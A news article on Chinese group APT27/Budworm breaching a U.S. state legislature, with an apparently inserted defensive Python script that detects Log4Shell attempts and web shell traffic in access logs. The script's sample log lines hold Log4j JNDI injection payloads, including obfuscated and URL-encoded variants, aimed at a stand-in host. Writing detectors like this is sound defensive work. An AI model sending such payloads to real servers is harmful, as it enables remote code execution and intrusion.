
A Resurgent Chinese Cyber Espionage Group Hacked a U.S. State Legislature

Symantec recently warned about the return of a Chinese cyber espionage group behind cyber attacks on a U.S. state legislature.

The endpoint solutions company attributed the attack to APT27, also known as Budworm, Bronze Union, Emissary Panda, Lucky Mouse, Iron Tiger, and TG-3390 (Threat Group 3390).

During its six years of absence on U.S. soil, the threat actor was responsible for various attacks in Southeast Asia, the Middle East, and Europe.

Active since 2010, Budworm targets various industries to gather intelligence for the Chinese government for military and political purposes.

Chinese hackers compromised a state legislature

Symantec did not disclose the state legislative body compromised by the Chinese hackers.

However, the company’s threat intelligence team disclosed that the hackers compromised a network used by employees and legislators.

Symantec did not disclose whether the group accessed sensitive materials or exfiltrated data.

Although the state legislative body might be the direct target, APT27 could also leverage the target to pivot to federal networks or the U.S. Congress.

This cyber attack is hardly surprising considering some U.S. legislators’ involvement in East Asian geopolitics, including the China-Taiwan issue.

“An organization without a strategic purpose for an adversary to target will be much less likely to find themselves the focus of nation-state level campaigns, but those who are or are simply unlucky will face a much more well equipped and sophisticated adversary,” said Chris Clements, VP of solutions architecture at Cerberus Sentinel.

Roger Grimes, a data-driven defense evangelist at KnowBe4, observed changes in target selection.

“In the past, most nation-state actors compromised targets associated with their adversary’s government and military,” Grimes said. “Now, today, the most common nation-state target is traditional organizations not directly aligned with governments or the military, although certainly governments and militaries are still greatly targeted.”

Chinese cyber espionage group gains new interest in U.S. organizations

Although the cyber espionage group targeted high-value assets, Symantec observed that “in recent years, the group’s activity appears to have been largely focused on Asia, the Middle East, and Europe.”

Among them are attacks on the government of a Middle Eastern country, a multinational electronics manufacturer, and, more recently, a hospital in Southeast Asia and a U.S.-based entity.

During its six-year hiatus, Palo Alto Networks’ Unit 42 researchers attributed the compromise of one U.S. organization in November 2021 to APT27.

Meanwhile, Symantec warned that a resumption of attacks against the United States signaled a change in the threat actor’s interest.

“A resumption of attacks against U.S.-based targets could signal a change in focus for the group.”

Chinese cyber espionage group suspected of hacking a defense contractor

CISA published a report about multiple APT groups compromising a defense industrial base organization for months.

Although CISA did not attribute the attack to any cyber espionage group, the tools, techniques, and procedures mirrored Budworm’s.

“… in recent months, Budworm has been linked to attacks against a U.S.-based target. A recent CISA report on multiple APT groups attacking a defense sector organization mentioned Budworm’s toolset,” Symantec wrote.

The Budworm cyber espionage group also actively exploited Log4j vulnerabilities to gain initial access and install web shells. The threat actor usually drops China Chopper web shells on compromised devices.

Coincidentally, the attack on a defense industrial base organization involved 17 China Chopper web shells dropped on a compromised Microsoft Exchange Server.

“In recent attacks, Budworm was observed exploiting Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105) in the Apache Tomcat service to deploy web shells, and using virtual private servers (VPS) as command and control (C&C) servers.”
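The two behaviours described above, Log4j lookup strings arriving in web requests and web shells being driven over HTTP, both leave traces in ordinary web server access logs. The following is an added defender-side example, not code from the article, Symantec, or CISA: it scans Tomcat-style combined access log lines for Log4j JNDI lookup strings (including URL-encoded and nested-lookup obfuscation, which is the case a naive `${jndi:` grep misses) and flags repeated POST requests to server-side script paths that are not in a known baseline, which is the traffic pattern a freshly dropped web shell produces. The log lines, IP addresses (documentation ranges), and baseline paths are all constructed for the example.

```python
import re
from urllib.parse import unquote
from typing import Dict, List, Tuple

# Constructed sample lines in Tomcat/Apache "combined" access log format.
# Addresses are from RFC 5737 documentation ranges; nothing here is a real IoC.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2022:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Oct/2022:10:01:05 +0000] "GET /app HTTP/1.1" 200 77 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.21 - - [10/Oct/2022:10:01:09 +0000] "GET /app HTTP/1.1" 200 77 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.5:1389/b}"
203.0.113.22 - - [10/Oct/2022:10:02:00 +0000] "GET /app?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.5%2Fc%7D HTTP/1.1" 200 77 "-" "curl/7.0"
203.0.113.23 - - [10/Oct/2022:10:05:00 +0000] "POST /manager/upload.jsp HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.23 - - [10/Oct/2022:10:05:01 +0000] "POST /manager/upload.jsp HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

# Hypothetical baseline: script paths the application is known to serve.
BASELINE_PATHS = {"/index.jsp", "/login.jsp"}
SCRIPT_EXT = (".jsp", ".jspx", ".asp", ".aspx", ".php")

_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Innermost nested lookups used to hide the literal "jndi": ${lower:j}, ${upper:n}
# and the default-value form ${anything:-j}. Both collapse to their last argument.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}")
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(r"\1", text)
        new = _DEFAULT_LOOKUP.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def find_log4shell(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per line whose decoded, de-obfuscated text contains a JNDI lookup."""
    hits = []
    for line in lines:
        # Decode twice to also catch double URL-encoding, then strip obfuscation.
        candidate = normalize_lookups(unquote(unquote(line)))
        m = _JNDI.search(candidate)
        if not m:
            continue
        parsed = _LINE.match(line)
        hits.append({
            "ip": parsed["ip"] if parsed else "?",
            "evidence": candidate[m.start():m.start() + 60],
        })
    return hits


def find_webshell_posts(lines: List[str], baseline: set) -> Dict[Tuple[str, str], int]:
    """Count POSTs per (client, path) to script files outside the known baseline."""
    counts: Dict[Tuple[str, str], int] = {}
    for line in lines:
        m = _LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if not path.lower().endswith(SCRIPT_EXT) or path in baseline:
            continue
        key = (m["ip"], path)
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for hit in find_log4shell(lines):
        print(f"log4shell attempt from {hit['ip']}: {hit['evidence']}")
    for (ip, path), n in find_webshell_posts(lines, BASELINE_PATHS).items():
        print(f"possible web shell traffic: {n} POST(s) from {ip} to {path}")
```

The normalisation step matters more than the final regex: the second and third sample lines carry exactly the same payload as the first, just URL-encoded or split across nested `${lower:...}` lookups, and a plain substring match on `${jndi:` would see only one of the three. The web-shell heuristic is deliberately coarse (any POST to a script path you did not deploy) because a China Chopper-style shell is a single file with no distinctive URL; reviewing new script files on the web root alongside these log hits is the follow-up a responder would do.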

If Budworm’s involvement in the hacking of a defense company is confirmed, it would mark a major success for the group shortly after resuming attacks on U.S. organizations.

According to the NSA, FBI, and CISA, China represents the most dynamic threat to civilian, government, and military networks.